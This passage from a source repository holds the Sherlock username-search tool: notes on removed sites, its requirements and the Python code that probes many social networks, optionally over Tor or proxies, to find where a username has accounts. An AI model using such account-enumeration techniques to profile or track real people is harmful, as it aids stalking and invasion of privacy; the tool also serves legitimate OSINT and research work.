Online 233 | 234 | Usernames that exist are not detected. 235 | 236 | ``` 237 | "EVE Online": { 238 | "errorType": "response_url", 239 | "errorUrl": "https://eveonline.com", 240 | "rank": 15347, 241 | "url": "https://evewho.com/pilot/{}/", 242 | "urlMain": "https://eveonline.com", 243 | "username_claimed": "blue", 244 | "username_unclaimed": "noonewouldeverusethis7" 245 | }, 246 | ``` 247 | 248 | ## AngelList 249 | 250 | Usernames that exist are not detected. 
251 | 252 | ``` 253 | "AngelList": { 254 | "errorType": "status_code", 255 | "rank": 5767, 256 | "url": "https://angel.co/{}", 257 | "urlMain": "https://angel.co/", 258 | "username_claimed": "blue", 259 | "username_unclaimed": "noonewouldeverusethis7" 260 | }, 261 | ``` 262 | 263 | ## Codepen 264 | 265 | Usernames that exist are not detected. 266 | 267 | ``` 268 | "Codepen": { 269 | "errorType": "status_code", 270 | "rank": 1359, 271 | "url": "https://codepen.io/{}", 272 | "urlMain": "https://codepen.io/", 273 | "username_claimed": "blue", 274 | "username_unclaimed": "noonewouldeverusethis7" 275 | }, 276 | ``` 277 | 278 | ## Imgur 279 | 280 | Looks like they made some changes to the site. Sherlock says that all 281 | usernames are available. 282 | 283 | ``` 284 | "Imgur": { 285 | "errorType": "status_code", 286 | "rank": 74, 287 | "url": "https://imgur.com/user/{}", 288 | "urlMain": "https://imgur.com/", 289 | "username_claimed": "blue", 290 | "username_unclaimed": "noonewouldeverusethis7" 291 | }, 292 | ``` 293 | 294 | ## PowerShell Gallery 295 | 296 | Accidentally merged even though the original pull request showed that all 297 | user names were available. 298 | 299 | ``` 300 | "PowerShell Gallery": { 301 | "errorType": "status_code", 302 | "rank": 163562, 303 | "url": "https://www.powershellgallery.com/profiles/{}", 304 | "urlMain": "https://www.powershellgallery.com", 305 | "username_claimed": "powershellteam", 306 | "username_unclaimed": "noonewouldeverusethis7" 307 | }, 308 | ``` 309 | 310 | ## LinkedIn 311 | 312 | This was attempted to be added around 2019-08-26, but the pull request was never merged. 313 | It turns out that LinkedIn requires that you have an account before they will let you 314 | check for other account. So, this site will not work with the current design of 315 | Sherlock. 316 | 317 | ## StreamMe 318 | 319 | On 2019-04-07, I get a Timed Out message from the website. It has not 320 | been working earlier either (for some weeks). 
It takes about 21s before 321 | the site finally times out, so it really makes getting the results from 322 | Sherlock a pain. 323 | 324 | If the site becomes available in the future, we can put it back in. 325 | 326 | ``` 327 | "StreamMe": { 328 | "errorType": "status_code", 329 | "rank": 31702, 330 | "url": "https://www.stream.me/{}", 331 | "urlMain": "https://www.stream.me/", 332 | "username_claimed": "blue", 333 | "username_unclaimed": "noonewouldeverusethis7" 334 | }, 335 | ``` 336 | 337 | ## BlackPlanet 338 | 339 | This site has always returned a false positive. The site returns the exact 340 | same text for a claimed or an unclaimed username. The site must be rendering 341 | all of the different content using Javascript in the browser. So, there is 342 | no way to distinguish between the results with the current design of Sherlock. 343 | 344 | ``` 345 | "BlackPlanet": { 346 | "errorMsg": "My Hits", 347 | "errorType": "message", 348 | "rank": 110021, 349 | "url": "http://blackplanet.com/{}", 350 | "urlMain": "http://blackplanet.com/" 351 | }, 352 | ``` 353 | 354 | ## Fotolog 355 | 356 | Around 2019-02-09, I get a 502 HTTP error (bad gateway) for any access. On 357 | 2019-03-10, the site is up, but it is in maintenance mode. 358 | 359 | It does not seem to be working, so there is no sense in including it in 360 | Sherlock. 361 | 362 | ``` 363 | "Fotolog": { 364 | "errorType": "status_code", 365 | "rank": 47777, 366 | "url": "https://fotolog.com/{}", 367 | "urlMain": "https://fotolog.com/" 368 | }, 369 | ``` 370 | 371 | ## Google Plus 372 | 373 | On 2019-04-02, Google shut down Google Plus. While the content for some 374 | users is available after that point, it is going away. And, no one will 375 | be able to create a new account. So, there is no value in keeping it in 376 | Sherlock. 377 | 378 | Good-bye [Google Plus](https://en.wikipedia.org/wiki/Google%2B)...
379 | 380 | ``` 381 | "Google Plus": { 382 | "errorType": "status_code", 383 | "rank": 1, 384 | "url": "https://plus.google.com/+{}", 385 | "urlMain": "https://plus.google.com/", 386 | "username_claimed": "davidbrin1", 387 | "username_unclaimed": "noonewouldeverusethis7" 388 | }, 389 | ``` 390 | 391 | ## CapFriendly 392 | 393 | As of 2020-02-17, CapFriendly returns fake profile pages for non-existing users; what seems to distinguish between the pages is the Sign-up date: for non-existing users, the web application returns a date before 2000-01-01. 394 | 395 | ``` 396 | "CapFriendly": { 397 | "errorMsg": "No User Found", 398 | "errorType": "message", 399 | "rank": 64100, 400 | "url": "https://www.capfriendly.com/users/{}", 401 | "urlMain": "https://www.capfriendly.com/", 402 | "username_claimed": "user", 403 | "username_unclaimed": "noonewouldeverusethis" 404 | }, 405 | ``` 406 | 407 | 408 | ## Furaffinity 409 | 410 | As of 2020-02-23, Furaffinity returns false positives because they are now using Cloudflare, which prevents Sherlock from checking if the user 411 | exists or not. 412 | 413 | ``` 414 | "furaffinity": { 415 | "errorMsg": "user cannot be found", 416 | "errorType": "message", 417 | "rank": 0, 418 | "url": "https://www.furaffinity.net/user/{}", 419 | "urlMain": "https://www.furaffinity.net", 420 | "username_claimed": "blue", 421 | "username_unclaimed": "noonewouldeverusethis777777" 422 | }, 423 | ``` 424 | 425 | 426 | ## InsaneJournal 427 | 428 | As of 2020-02-23, InsaneJournal returns a false positive when providing a username which contains a period. 429 | Since we were not able to find the criteria for a valid username, the best thing to do now is to remove it.
430 | 431 | ``` 432 | "InsaneJournal": { 433 | "errorMsg": "Unknown user", 434 | "errorType": "message", 435 | "rank": 29728, 436 | "url": "http://{}.insanejournal.com/profile", 437 | "urlMain": "insanejournal.com", 438 | "username_claimed": "blue", 439 | "username_unclaimed": "dlyr6cd" 440 | }, 441 | ``` 442 | -------------------------------------------------------------------------------- /sherlock/requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4>=4.8.0 2 | bs4>=0.0.1 3 | certifi>=2019.6.16 4 | colorama>=0.4.1 5 | lxml>=4.4.0 6 | PySocks>=1.7.0 7 | requests>=2.22.0 8 | requests-futures>=1.0.0 9 | soupsieve>=1.9.2 10 | stem>=1.8.0 11 | torrequest>=0.1.0 12 | -------------------------------------------------------------------------------- /sherlock/sherlock.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | """ 4 | Sherlock: Find Usernames Across Social Networks Module 5 | 6 | This module contains the main logic to search for usernames at social 7 | networks. 8 | """ 9 | 10 | import csv 11 | import json 12 | import os 13 | import platform 14 | import re 15 | import sys 16 | import random 17 | from argparse import ArgumentParser, RawDescriptionHelpFormatter 18 | from concurrent.futures import ThreadPoolExecutor 19 | from time import time 20 | import webbrowser 21 | 22 | import requests 23 | from colorama import Fore, Style, init 24 | 25 | from requests_futures.sessions import FuturesSession 26 | from torrequest import TorRequest 27 | from load_proxies import load_proxies_from_csv, check_proxy_list 28 | 29 | module_name = "Sherlock: Find Usernames Across Social Networks" 30 | __version__ = "0.10.9" 31 | 32 | 33 | global proxy_list 34 | 35 | proxy_list = [] 36 | 37 | class ElapsedFuturesSession(FuturesSession): 38 | """ 39 | Extends FutureSession to add a response time metric to each request. 
40 | 41 | This is taken (almost) directly from here: https://github.com/ross/requests-futures#working-in-the-background 42 | """ 43 | 44 | def request(self, method, url, hooks={}, *args, **kwargs): 45 | start = time() 46 | 47 | def timing(r, *args, **kwargs): 48 | elapsed_sec = time() - start 49 | r.elapsed = round(elapsed_sec * 1000) 50 | 51 | try: 52 | if isinstance(hooks['response'], (list, tuple)): 53 | # needs to be first so we don't time other hooks execution 54 | hooks['response'].insert(0, timing) 55 | else: 56 | hooks['response'] = [timing, hooks['response']] 57 | except KeyError: 58 | hooks['response'] = timing 59 | 60 | return super(ElapsedFuturesSession, self).request(method, url, hooks=hooks, *args, **kwargs) 61 | 62 | 63 | def print_info(title, info, color=True): 64 | if color: 65 | print(Style.BRIGHT + Fore.GREEN + "[" + 66 | Fore.YELLOW + "*" + 67 | Fore.GREEN + f"] {title}" + 68 | Fore.WHITE + f" {info}" + 69 | Fore.GREEN + " on:") 70 | else: 71 | print(f"[*] {title} {info} on:") 72 | 73 | def print_error(err, errstr, var, verbose=False, color=True): 74 | if color: 75 | print(Style.BRIGHT + Fore.WHITE + "[" + 76 | Fore.RED + "-" + 77 | Fore.WHITE + "]" + 78 | Fore.RED + f" {errstr}" + 79 | Fore.YELLOW + f" {err if verbose else var}") 80 | else: 81 | print(f"[-] {errstr} {err if verbose else var}") 82 | 83 | 84 | def format_response_time(response_time, verbose): 85 | return " [{} ms]".format(response_time) if verbose else "" 86 | 87 | 88 | def print_found(social_network, url, response_time, verbose=False, color=True): 89 | if color: 90 | print((Style.BRIGHT + Fore.WHITE + "[" + 91 | Fore.GREEN + "+" + 92 | Fore.WHITE + "]" + 93 | format_response_time(response_time, verbose) + 94 | Fore.GREEN + f" {social_network}:"), url) 95 | else: 96 | print(f"[+]{format_response_time(response_time, verbose)} {social_network}: {url}") 97 | 98 | def print_not_found(social_network, response_time, verbose=False, color=True): 99 | if color: 100 | print((Style.BRIGHT + 
Fore.WHITE + "[" + 101 | Fore.RED + "-" + 102 | Fore.WHITE + "]" + 103 | format_response_time(response_time, verbose) + 104 | Fore.GREEN + f" {social_network}:" + 105 | Fore.YELLOW + " Not Found!")) 106 | else: 107 | print(f"[-]{format_response_time(response_time, verbose)} {social_network}: Not Found!") 108 | 109 | def print_invalid(social_network, msg, color=True): 110 | """Print invalid search result.""" 111 | if color: 112 | print((Style.BRIGHT + Fore.WHITE + "[" + 113 | Fore.RED + "-" + 114 | Fore.WHITE + "]" + 115 | Fore.GREEN + f" {social_network}:" + 116 | Fore.YELLOW + f" {msg}")) 117 | else: 118 | print(f"[-] {social_network} {msg}") 119 | 120 | 121 | def get_response(request_future, error_type, social_network, verbose=False, retry_no=None, color=True): 122 | 123 | global proxy_list 124 | 125 | try: 126 | rsp = request_future.result() 127 | if rsp.status_code: 128 | return rsp, error_type, rsp.elapsed 129 | except requests.exceptions.HTTPError as errh: 130 | print_error(errh, "HTTP Error:", social_network, verbose, color) 131 | 132 | # In case our proxy fails, we retry with another proxy. 133 | except requests.exceptions.ProxyError as errp: 134 | if retry_no>0 and len(proxy_list)>0: 135 | #Selecting the new proxy. 
136 | new_proxy = random.choice(proxy_list) 137 | new_proxy = f'{new_proxy.protocol}://{new_proxy.ip}:{new_proxy.port}' 138 | print(f'Retrying with {new_proxy}') 139 | request_future.proxy = {'http':new_proxy,'https':new_proxy} 140 | get_response(request_future,error_type, social_network, verbose,retry_no=retry_no-1, color=color) 141 | else: 142 | print_error(errp, "Proxy error:", social_network, verbose, color) 143 | except requests.exceptions.ConnectionError as errc: 144 | print_error(errc, "Error Connecting:", social_network, verbose, color) 145 | except requests.exceptions.Timeout as errt: 146 | print_error(errt, "Timeout Error:", social_network, verbose, color) 147 | except requests.exceptions.RequestException as err: 148 | print_error(err, "Unknown error:", social_network, verbose, color) 149 | return None, "", -1 150 | 151 | 152 | def sherlock(username, site_data, verbose=False, tor=False, unique_tor=False, 153 | proxy=None, print_found_only=False, timeout=None, color=True): 154 | """Run Sherlock Analysis. 155 | 156 | Checks for existence of username on various social media sites. 157 | 158 | Keyword Arguments: 159 | username -- String indicating username that report 160 | should be created against. 161 | site_data -- Dictionary containing all of the site data. 162 | verbose -- Boolean indicating whether to give verbose output. 163 | tor -- Boolean indicating whether to use a tor circuit for the requests. 164 | unique_tor -- Boolean indicating whether to use a new tor circuit for each request. 165 | proxy -- String indicating the proxy URL 166 | timeout -- Time in seconds to wait before timing out request. 167 | Default is no timeout. 168 | color -- Boolean indicating whether to color terminal output 169 | 170 | Return Value: 171 | Dictionary containing results from report. Key of dictionary is the name 172 | of the social network site, and the value is another dictionary with 173 | the following keys: 174 | url_main: URL of main site. 
175 | url_user: URL of user on site (if account exists). 176 | exists: String indicating results of test for account existence. 177 | http_status: HTTP status code of query which checked for existence on 178 | site. 179 | response_text: Text that came back from request. May be None if 180 | there was an HTTP error when checking for existence. 181 | """ 182 | print_info("Checking username", username, color) 183 | 184 | # Create session based on request methodology 185 | if tor or unique_tor: 186 | #Requests using Tor obfuscation 187 | underlying_request = TorRequest() 188 | underlying_session = underlying_request.session 189 | else: 190 | #Normal requests 191 | underlying_session = requests.session() 192 | underlying_request = requests.Request() 193 | 194 | #Limit number of workers to 20. 195 | #This is probably vastly overkill. 196 | if len(site_data) >= 20: 197 | max_workers=20 198 | else: 199 | max_workers=len(site_data) 200 | 201 | #Create multi-threaded session for all requests. 202 | session = ElapsedFuturesSession(max_workers=max_workers, 203 | session=underlying_session) 204 | 205 | # Results from analysis of all sites 206 | results_total = {} 207 | 208 | # First create futures for all requests. This allows for the requests to run in parallel 209 | for social_network, net_info in site_data.items(): 210 | 211 | # Results from analysis of this specific site 212 | results_site = {} 213 | 214 | # Record URL of main site 215 | results_site['url_main'] = net_info.get("urlMain") 216 | 217 | # A user agent is needed because some sites don't return the correct 218 | # information since they think that we are bots (Which we actually are...) 219 | headers = { 220 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0', 221 | } 222 | 223 | if "headers" in net_info: 224 | # Override/append any extra headers required by a given site. 
225 | headers.update(net_info["headers"]) 226 | 227 | # Don't make request if username is invalid for the site 228 | regex_check = net_info.get("regexCheck") 229 | if regex_check and re.search(regex_check, username) is None: 230 | # No need to do the check at the site: this user name is not allowed. 231 | if not print_found_only: 232 | print_invalid(social_network, "Illegal Username Format For This Site!", color) 233 | 234 | results_site["exists"] = "illegal" 235 | results_site["url_user"] = "" 236 | results_site['http_status'] = "" 237 | results_site['response_text'] = "" 238 | results_site['response_time_ms'] = "" 239 | else: 240 | # URL of user on site (if it exists) 241 | url = net_info["url"].format(username) 242 | results_site["url_user"] = url 243 | url_probe = net_info.get("urlProbe") 244 | if url_probe is None: 245 | # Probe URL is normal one seen by people out on the web. 246 | url_probe = url 247 | else: 248 | # There is a special URL for probing existence separate 249 | # from where the user profile normally can be found. 250 | url_probe = url_probe.format(username) 251 | 252 | #If only the status_code is needed don't download the body 253 | if net_info["errorType"] == 'status_code': 254 | request_method = session.head 255 | else: 256 | request_method = session.get 257 | 258 | if net_info["errorType"] == "response_url": 259 | # Site forwards request to a different URL if username not 260 | # found. Disallow the redirect so we can capture the 261 | # http status from the original URL request. 262 | allow_redirects = False 263 | else: 264 | # Allow whatever redirect that the site wants to do. 265 | # The final result of the request will be what is available. 
266 | allow_redirects = True 267 | 268 | # This future starts running the request in a new thread, doesn't block the main thread 269 | if proxy != None: 270 | proxies = {"http": proxy, "https": proxy} 271 | future = request_method(url=url_probe, headers=headers, 272 | proxies=proxies, 273 | allow_redirects=allow_redirects, 274 | timeout=timeout 275 | ) 276 | else: 277 | future = request_method(url=url_probe, headers=headers, 278 | allow_redirects=allow_redirects, 279 | timeout=timeout 280 | ) 281 | 282 | # Store future in data for access later 283 | net_info["request_future"] = future 284 | 285 | # Reset identify for tor (if needed) 286 | if unique_tor: 287 | underlying_request.reset_identity() 288 | 289 | # Add this site's results into final dictionary with all of the other results. 290 | results_total[social_network] = results_site 291 | 292 | # Open the file containing account links 293 | # Core logic: If tor requests, make them here. If multi-threaded requests, wait for responses 294 | for social_network, net_info in site_data.items(): 295 | 296 | # Retrieve results again 297 | results_site = results_total.get(social_network) 298 | 299 | # Retrieve other site information again 300 | url = results_site.get("url_user") 301 | exists = results_site.get("exists") 302 | if exists is not None: 303 | # We have already determined the user doesn't exist here 304 | continue 305 | 306 | # Get the expected error type 307 | error_type = net_info["errorType"] 308 | 309 | # Default data in case there are any failures in doing a request. 310 | http_status = "?" 
311 | response_text = "" 312 | 313 | # Retrieve future and ensure it has finished 314 | future = net_info["request_future"] 315 | r, error_type, response_time = get_response(request_future=future, 316 | error_type=error_type, 317 | social_network=social_network, 318 | verbose=verbose, 319 | retry_no=3, 320 | color=color) 321 | 322 | # Attempt to get request information 323 | try: 324 | http_status = r.status_code 325 | except: 326 | pass 327 | try: 328 | response_text = r.text.encode(r.encoding) 329 | except: 330 | pass 331 | 332 | if error_type == "message": 333 | error = net_info.get("errorMsg") 334 | # Checks if the error message is in the HTML 335 | if not error in r.text: 336 | print_found(social_network, url, response_time, verbose, color) 337 | exists = "yes" 338 | else: 339 | if not print_found_only: 340 | print_not_found(social_network, response_time, verbose, color) 341 | exists = "no" 342 | 343 | elif error_type == "status_code": 344 | # Checks if the status code of the response is 2XX 345 | if not r.status_code >= 300 or r.status_code < 200: 346 | print_found(social_network, url, response_time, verbose, color) 347 | exists = "yes" 348 | else: 349 | if not print_found_only: 350 | print_not_found(social_network, response_time, verbose, color) 351 | exists = "no" 352 | 353 | elif error_type == "response_url": 354 | # For this detection method, we have turned off the redirect. 355 | # So, there is no need to check the response URL: it will always 356 | # match the request. Instead, we will ensure that the response 357 | # code indicates that the request was successful (i.e. no 404, or 358 | # forward to some odd redirect). 
359 | if 200 <= r.status_code < 300: 360 | # 361 | print_found(social_network, url, response_time, verbose, color) 362 | exists = "yes" 363 | else: 364 | if not print_found_only: 365 | print_not_found(social_network, response_time, verbose, color) 366 | exists = "no" 367 | 368 | elif error_type == "": 369 | if not print_found_only: 370 | print_invalid(social_network, "Error!", color) 371 | exists = "error" 372 | 373 | # Save exists flag 374 | results_site['exists'] = exists 375 | 376 | # Save results from request 377 | results_site['http_status'] = http_status 378 | results_site['response_text'] = response_text 379 | results_site['response_time_ms'] = response_time 380 | 381 | # Add this site's results into final dictionary with all of the other results. 382 | results_total[social_network] = results_site 383 | return results_total 384 | 385 | 386 | def timeout_check(value): 387 | """Check Timeout Argument. 388 | 389 | Checks timeout for validity. 390 | 391 | Keyword Arguments: 392 | value -- Time in seconds to wait before timing out request. 393 | 394 | Return Value: 395 | Floating point number representing the time (in seconds) that should be 396 | used for the timeout. 397 | 398 | NOTE: Will raise an exception if the timeout in invalid. 399 | """ 400 | from argparse import ArgumentTypeError 401 | 402 | try: 403 | timeout = float(value) 404 | except: 405 | raise ArgumentTypeError(f"Timeout '{value}' must be a number.") 406 | if timeout <= 0: 407 | raise ArgumentTypeError(f"Timeout '{value}' must be greater than 0.0s.") 408 | return timeout 409 | 410 | 411 | def main(): 412 | # Colorama module's initialization. 
413 | init(autoreset=True) 414 | 415 | version_string = f"%(prog)s {__version__}\n" + \ 416 | f"{requests.__description__}: {requests.__version__}\n" + \ 417 | f"Python: {platform.python_version()}" 418 | 419 | parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, 420 | description=f"{module_name} (Version {__version__})" 421 | ) 422 | parser.add_argument("--version", 423 | action="version", version=version_string, 424 | help="Display version information and dependencies." 425 | ) 426 | parser.add_argument("--verbose", "-v", "-d", "--debug", 427 | action="store_true", dest="verbose", default=False, 428 | help="Display extra debugging information and metrics." 429 | ) 430 | parser.add_argument("--rank", "-r", 431 | action="store_true", dest="rank", default=False, 432 | help="Present websites ordered by their Alexa.com global rank in popularity.") 433 | parser.add_argument("--folderoutput", "-fo", dest="folderoutput", 434 | help="If using multiple usernames, the output of the results will be saved to this folder." 435 | ) 436 | parser.add_argument("--output", "-o", dest="output", 437 | help="If using single username, the output of the result will be saved to this file." 438 | ) 439 | parser.add_argument("--tor", "-t", 440 | action="store_true", dest="tor", default=False, 441 | help="Make requests over Tor; increases runtime; requires Tor to be installed and in system path.") 442 | parser.add_argument("--unique-tor", "-u", 443 | action="store_true", dest="unique_tor", default=False, 444 | help="Make requests over Tor with new Tor circuit after each request; increases runtime; requires Tor to be installed and in system path.") 445 | parser.add_argument("--csv", 446 | action="store_true", dest="csv", default=False, 447 | help="Create Comma-Separated Values (CSV) File." 448 | ) 449 | parser.add_argument("--site", 450 | action="append", metavar='SITE_NAME', 451 | dest="site_list", default=None, 452 | help="Limit analysis to just the listed sites. 
Add multiple options to specify more than one site." 453 | ) 454 | parser.add_argument("--proxy", "-p", metavar='PROXY_URL', 455 | action="store", dest="proxy", default=None, 456 | help="Make requests over a proxy. e.g. socks5://127.0.0.1:1080" 457 | ) 458 | parser.add_argument("--json", "-j", metavar="JSON_FILE", 459 | dest="json_file", default="data.json", 460 | help="Load data from a JSON file or an online, valid, JSON file.") 461 | parser.add_argument("--proxy_list", "-pl", metavar='PROXY_LIST', 462 | action="store", dest="proxy_list", default=None, 463 | help="Make requests over a proxy randomly chosen from a list generated from a .csv file." 464 | ) 465 | parser.add_argument("--check_proxies", "-cp", metavar='CHECK_PROXY', 466 | action="store", dest="check_prox", default=None, 467 | help="To be used with the '--proxy_list' parameter. " 468 | "The script will check if the proxies supplied in the .csv file are working and anonymous." 469 | "Put 0 for no limit on successfully checked proxies, or another number to institute a limit." 470 | ) 471 | parser.add_argument("--timeout", 472 | action="store", metavar='TIMEOUT', 473 | dest="timeout", type=timeout_check, default=None, 474 | help="Time (in seconds) to wait for response to requests. " 475 | "Default timeout of 60.0s." 476 | "A longer timeout will be more likely to get results from slow sites." 477 | "On the other hand, this may cause a long delay to gather all results." 478 | ) 479 | parser.add_argument("--print-found", 480 | action="store_true", dest="print_found_only", default=False, 481 | help="Do not output sites where the username was not found." 482 | ) 483 | parser.add_argument("--no-color", 484 | action="store_true", dest="no_color", default=False, 485 | help="Don't color terminal output" 486 | ) 487 | parser.add_argument("username", 488 | nargs='+', metavar='USERNAMES', 489 | action="store", 490 | help="One or more usernames to check with social networks." 
491 | ) 492 | parser.add_argument("--browse", "-b", 493 | action="store_true", dest="browse", default=False, 494 | help="Browse to all results on default bowser.") 495 | 496 | args = parser.parse_args() 497 | 498 | 499 | # Argument check 500 | # TODO regex check on args.proxy 501 | if args.tor and (args.proxy != None or args.proxy_list != None): 502 | raise Exception("Tor and Proxy cannot be set in the meantime.") 503 | 504 | # Proxy argument check. 505 | # Does not necessarily need to throw an error, 506 | # since we could join the single proxy with the ones generated from the .csv, 507 | # but it seems unnecessarily complex at this time. 508 | if args.proxy != None and args.proxy_list != None: 509 | raise Exception("A single proxy cannot be used along with proxy list.") 510 | 511 | # Make prompts 512 | if args.proxy != None: 513 | print("Using the proxy: " + args.proxy) 514 | 515 | global proxy_list 516 | 517 | if args.proxy_list != None: 518 | print_info("Loading proxies from", args.proxy_list, not args.color) 519 | 520 | proxy_list = load_proxies_from_csv(args.proxy_list) 521 | 522 | # Checking if proxies should be checked for anonymity. 523 | if args.check_prox != None and args.proxy_list != None: 524 | try: 525 | limit = int(args.check_prox) 526 | if limit == 0: 527 | proxy_list = check_proxy_list(proxy_list) 528 | elif limit > 0: 529 | proxy_list = check_proxy_list(proxy_list, limit) 530 | else: 531 | raise ValueError 532 | except ValueError: 533 | raise Exception("Parameter --check_proxies/-cp must be a positive integer.") 534 | 535 | if args.tor or args.unique_tor: 536 | print("Using Tor to make requests") 537 | print("Warning: some websites might refuse connecting over Tor, so note that using this option might increase connection errors.") 538 | 539 | # Check if both output methods are entered as input. 
540 | if args.output is not None and args.folderoutput is not None: 541 | print("You can only use one of the output methods.") 542 | sys.exit(1) 543 | 544 | # Check validity for single username output. 545 | if args.output is not None and len(args.username) != 1: 546 | print("You can only use --output with a single username") 547 | sys.exit(1) 548 | 549 | response_json_online = None 550 | site_data_all = None 551 | 552 | # Try to load json from website. 553 | try: 554 | response_json_online = requests.get(url=args.json_file) 555 | except requests.exceptions.MissingSchema: # In case the schema is wrong it's because it may not be a website 556 | pass 557 | 558 | # Check if the response is appropriate. 559 | if response_json_online is not None and response_json_online.status_code == 200: 560 | # Since we got data from a website, try to load json and exit if parsing fails. 561 | try: 562 | site_data_all = response_json_online.json() 563 | except ValueError: 564 | print("Invalid JSON from website!") 565 | sys.exit(1) 566 | pass 567 | 568 | data_file_path = os.path.join(os.path.dirname( 569 | os.path.realpath(__file__)), args.json_file) 570 | # This will be none if the request had a missing schema 571 | if site_data_all is None: 572 | # Check if the file exists otherwise exit. 573 | if not os.path.exists(data_file_path): 574 | print("JSON file doesn't exist.") 575 | print( 576 | "If this is not a file but a website, make sure you have appended http:// or https://.") 577 | sys.exit(1) 578 | else: 579 | raw = open(data_file_path, "r", encoding="utf-8") 580 | try: 581 | site_data_all = json.load(raw) 582 | except: 583 | print("Invalid JSON loaded from file.") 584 | 585 | if args.site_list is None: 586 | # Not desired to look at a sub-set of sites 587 | site_data = site_data_all 588 | else: 589 | # User desires to selectively run queries on a sub-set of the site list. 590 | 591 | # Make sure that the sites are supported & build up pruned site database. 
592 | site_data = {} 593 | site_missing = [] 594 | for site in args.site_list: 595 | for existing_site in site_data_all: 596 | if site.lower() == existing_site.lower(): 597 | site_data[existing_site] = site_data_all[existing_site] 598 | if not site_data: 599 | # Build up list of sites not supported for future error message. 600 | site_missing.append(f"'{site}'") 601 | 602 | if site_missing: 603 | print( 604 | f"Error: Desired sites not found: {', '.join(site_missing)}.") 605 | sys.exit(1) 606 | 607 | if args.rank: 608 | # Sort data by rank 609 | site_dataCpy = dict(site_data) 610 | ranked_sites = sorted(site_data, key=lambda k: ("rank" not in k, site_data[k].get("rank", sys.maxsize))) 611 | site_data = {} 612 | for site in ranked_sites: 613 | site_data[site] = site_dataCpy.get(site) 614 | 615 | # Run report on all specified users. 616 | for username in args.username: 617 | print() 618 | 619 | if args.output: 620 | file = open(args.output, "w", encoding="utf-8") 621 | elif args.folderoutput: # In case we handle multiple usernames at a targetted folder. 622 | # If the folder doesnt exist, create it first 623 | if not os.path.isdir(args.folderoutput): 624 | os.mkdir(args.folderoutput) 625 | file = open(os.path.join(args.folderoutput, 626 | username + ".txt"), "w", encoding="utf-8") 627 | else: 628 | file = open(username + ".txt", "w", encoding="utf-8") 629 | 630 | # We try to ad a random member of the 'proxy_list' var as the proxy of the request. 631 | # If we can't access the list or it is empty, we proceed with args.proxy as the proxy. 
632 | try: 633 | random_proxy = random.choice(proxy_list) 634 | proxy = f'{random_proxy.protocol}://{random_proxy.ip}:{random_proxy.port}' 635 | except (NameError, IndexError): 636 | proxy = args.proxy 637 | 638 | results = sherlock(username, 639 | site_data, 640 | verbose=args.verbose, 641 | tor=args.tor, 642 | unique_tor=args.unique_tor, 643 | proxy=args.proxy, 644 | print_found_only=args.print_found_only, 645 | timeout=args.timeout, 646 | color=not args.no_color) 647 | 648 | exists_counter = 0 649 | for website_name in results: 650 | dictionary = results[website_name] 651 | if dictionary.get("exists") == "yes": 652 | exists_counter += 1 653 | file.write(dictionary["url_user"] + "\n") 654 | if args.browse : 655 | webbrowser.open(dictionary["url_user"]) 656 | file.write(f"Total Websites Username Detected On : {exists_counter}") 657 | file.close() 658 | 659 | if args.csv == True: 660 | with open(username + ".csv", "w", newline='', encoding="utf-8") as csv_report: 661 | writer = csv.writer(csv_report) 662 | writer.writerow(['username', 663 | 'name', 664 | 'url_main', 665 | 'url_user', 666 | 'exists', 667 | 'http_status', 668 | 'response_time_ms' 669 | ] 670 | ) 671 | for site in results: 672 | writer.writerow([username, 673 | site, 674 | results[site]['url_main'], 675 | results[site]['url_user'], 676 | results[site]['exists'], 677 | results[site]['http_status'], 678 | results[site]['response_time_ms'] 679 | ] 680 | ) 681 | 682 | 683 | if __name__ == "__main__": 684 | main() 685 | -------------------------------------------------------------------------------- /sherlock/site_list.py: -------------------------------------------------------------------------------- 1 | """Sherlock: Supported Site Listing 2 | This module generates the listing of supported sites. 
3 | """ 4 | import json 5 | import sys 6 | import requests 7 | import threading 8 | import xml.etree.ElementTree as ET 9 | from datetime import datetime 10 | from argparse import ArgumentParser, RawDescriptionHelpFormatter 11 | 12 | pool = list() 13 | 14 | def get_rank(domain_to_query, dest): 15 | 16 | #Retrieve ranking data via alexa API 17 | url = f"http://data.alexa.com/data?cli=10&url={domain_to_query}" 18 | xml_data = requests.get(url).text 19 | root = ET.fromstring(xml_data) 20 | try: 21 | #Get ranking for this site. 22 | dest['rank'] = int(root.find(".//REACH").attrib["RANK"]) 23 | except: 24 | #We did not find the rank for some reason. 25 | print(f"Error retrieving rank information for '{domain_to_query}'") 26 | print(f" Returned XML is |{xml_data}|") 27 | 28 | return 29 | 30 | parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter 31 | ) 32 | parser.add_argument("--rank","-r", 33 | action="store_true", dest="rank", default=False, 34 | help="Update all website ranks (not recommended)." 35 | ) 36 | args = parser.parse_args() 37 | 38 | with open("data.json", "r", encoding="utf-8") as data_file: 39 | data = json.load(data_file) 40 | 41 | with open("sites.md", "w") as site_file: 42 | data_length = len(data) 43 | site_file.write(f'## List Of Supported Sites ({data_length} Sites In Total!)\n') 44 | 45 | for social_network in data: 46 | url_main = data.get(social_network).get("urlMain") 47 | data.get(social_network)["rank"] = 0 48 | if args.rank: 49 | th = threading.Thread(target=get_rank, args=(url_main, data.get(social_network))) 50 | else: 51 | th = None 52 | pool.append((social_network, url_main, th)) 53 | if args.rank: 54 | th.start() 55 | 56 | index = 1 57 | for social_network, url_main, th in pool: 58 | if args.rank: 59 | th.join() 60 | site_file.write(f'{index}. 
